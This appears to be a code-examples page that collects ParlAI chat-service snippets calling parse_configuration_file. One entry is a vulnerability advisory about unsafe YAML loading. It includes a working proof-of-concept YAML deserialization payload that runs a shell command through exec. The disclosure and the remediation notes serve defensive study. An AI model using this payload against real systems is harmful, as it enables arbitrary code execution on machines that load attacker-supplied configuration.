Exemplo n.º 1
    def setup_opt(self):
        """
        Build the ParlAI ``Opt`` this service runs with.

        Three sources are merged, in increasing precedence: the instance's
        ParlAI paths (``parlai_home``, ``parlai_datapath``,
        ``parlai_download``) plus a fixed ``safety='all'`` setting, and the
        ``world_opt`` section of the YAML file at ``/app/src/nlp/config.yml``.
        The whole parsed configuration is additionally kept under
        ``opt['config']``.

        Returns:
            Opt: the populated options object.
        """
        opt = Opt()

        # Fixed, container-local path; the shared helper does the parsing.
        # NOTE(review): parse_configuration_file must load this YAML with
        # yaml.safe_load — a full loader would let a crafted config file run
        # arbitrary code at startup. Confirm in config_utils.
        parsed = config_utils.parse_configuration_file('/app/src/nlp/config.yml')

        # Defaults first; item assignment keeps Opt's own __setitem__ in play.
        defaults = (
            ('parlai_home', self.parlai_home),
            ('datapath', self.parlai_datapath),
            ('download_path', self.parlai_download),
            ('safety', 'all'),
        )
        for key, value in defaults:
            opt[key] = value

        # world_opt entries override the defaults set above.
        opt.update(parsed['world_opt'])
        opt['config'] = parsed

        return opt
Exemplo n.º 2
############################################################################

Vulnerability details

############################################################################

Description
ParlAI was vulnerable to a YAML deserialization attack caused by unsafe
loading, which leads to arbitrary code execution.

Proof of Concept

Create the following PoC file (exploit.py)

# PoC for the unsafe-YAML-loading issue: the document below relies on PyYAML's
# python-specific tags, which only the full (unsafe) loader honours.
# yaml.safe_load refuses these tags, so switching the loader in
# parse_configuration_file is the fix.
import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
# Written out as config.yml and handed to the vulnerable helper (demo code:
# the file handle is never closed).
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the Python script, i.e. `python3 exploit.py`

Impact
Code Execution

############################################################################
Exemplo n.º 3
    """
    parser = ParlaiParser(False, False)
    parser.add_parlai_data_path()
    parser.add_chatservice_args()
    parser_grp = parser.add_argument_group('Discord Chat')
    parser_grp.add_argument(
        '--port', default=35496, type=int, help='Port to run the discord chat server'
    )
    return parser.parse_args()


def run(opt):
    """
    Run DiscordManager.

    Tags ``opt`` with this module's ``SERVICE_NAME``, builds a
    ``DiscordManager`` from it and runs its task. ``shutdown()`` is invoked
    unconditionally, so the manager is torn down even when ``start_task()``
    raises.

    Args:
        opt: ParlAI options dict; mutated in place (``opt['service']`` is set).
    """
    opt['service'] = SERVICE_NAME
    service = DiscordManager(opt)
    try:
        service.start_task()
    finally:
        # Runs on both the normal and the error path.
        service.shutdown()


if __name__ == '__main__':
    opt = setup_args()
    # The YAML path is taken from the parsed arguments under 'config_path'.
    # NOTE(review): parse_configuration_file must use yaml.safe_load; with a
    # full loader a crafted config file could execute code here — confirm.
    config = config_utils.parse_configuration_file(opt.get('config_path'))
    # world_opt values take precedence over the command-line arguments.
    opt.update(config['world_opt'])
    opt['config'] = config
    run(opt)
Exemplo n.º 4
    parser = ParlaiParser(False, False)
    parser.add_parlai_data_path()
    parser.add_chatservice_args()
    parser_grp = parser.add_argument_group('Browser Chat')
    parser_grp.add_argument('--port',
                            default=35496,
                            type=int,
                            help='Port to run the browser chat server')
    return parser.parse_args()


def run(opt):
    """
    Run BrowserManager.

    Tags ``opt`` with this module's ``SERVICE_NAME``, builds a
    ``BrowserManager`` from it and runs its task. ``shutdown()`` is invoked
    unconditionally, so the manager is torn down even when ``start_task()``
    raises.

    Args:
        opt: ParlAI options dict; mutated in place (``opt['service']`` is set).
    """
    opt['service'] = SERVICE_NAME
    service = BrowserManager(opt)
    try:
        service.start_task()
    finally:
        # Runs on both the normal and the error path.
        service.shutdown()


if __name__ == '__main__':
    opt = setup_args()
    # The YAML path is taken from the parsed arguments under 'config_path'.
    # NOTE(review): parse_configuration_file must use yaml.safe_load; with a
    # full loader a crafted config file could execute code here — confirm.
    config = parse_configuration_file(opt.get('config_path'))
    # world_opt values take precedence over the command-line arguments.
    opt.update(config['world_opt'])
    opt['config'] = config
    run(opt)